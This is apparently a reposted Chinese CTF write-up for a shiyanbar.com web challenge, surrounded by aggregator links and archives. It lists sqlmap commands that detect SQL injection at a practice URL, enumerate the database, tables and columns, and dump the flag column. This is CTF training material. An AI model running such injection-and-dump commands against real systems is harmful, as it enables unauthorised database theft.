实验吧web

编程语言 2018-10-21 12:28:55 阅读次数: 0

题目：

很明显。过年过节不送礼，送礼就送这个

格式：

解题链接： http://ctf5.shiyanbar.com/8/index.php?id=1

首先用sqlmap判断是否存在sql注入

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1"

然后爆出其数据库名称

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs

爆出其表

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables

爆出字段

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

得到flage

猜你喜欢

转载自blog.csdn.net/mengtongxch/article/details/83177347

实验吧web题：

实验吧web

实验吧-Web

实验吧-web-FALSE

实验吧-web-Forms

实验吧——WEB-FALSE

实验吧——WEB-Forms

决斗场 - 实验吧 WEB Once More

决斗场 - 实验吧 WEB FALSE

决斗场 - 实验吧 WEB 上传绕过

NSCTF web200-实验吧

NSCTF web200——实验吧

实验吧——Web-PHP大法

实验吧——NSCTF web200

实验吧web-易-上传绕过

实验吧web-易-FALSE

实验吧web-中-忘记密码了

CTF实验吧-WEB专题-6

CTF实验吧-WEB专题-1

实验吧 WEB 猫抓老鼠

CTF实验吧-WEB专题-4

CTF实验吧-WEB专题-5

实验吧ctf题库web题wp

实验吧web加了料的报错注入

实验吧web天网管理系统

实验吧 NSCTF web200

实验吧——WEB-猫抓老鼠

实验吧——WEB-Guess Next Session

实验吧——WEB-Once More

实验吧——WEB-忘记密码了

今日推荐

周排行

四大线程池详解

如何高效使用Vim

Mogodb的常用操作总结

Spyder默认页面布局调整

SAR日志分析

OAuth是一个关于授权（authorization）的开放网络标准，在全世界得到广泛应用，目前的版本是2.0版。本文对OAuth 2.0的设计思路和运行流程，做一个简明通俗的解释，主要参考材料为R

WebService中注解开发，CXF，Spring整合，Rest风格

2019考研英语一 Text1分析

windows下安装docker详细步骤

CentOS 7/6系统升级内核版本到5.2.2

每日归档

2024-08-05(0)

2024-08-04(0)

2024-08-03(0)

2024-08-02(0)

2024-08-01(0)

2024-07-31(0)

2024-07-30(0)

2024-07-29(0)

2024-07-28(0)

2024-07-27(0)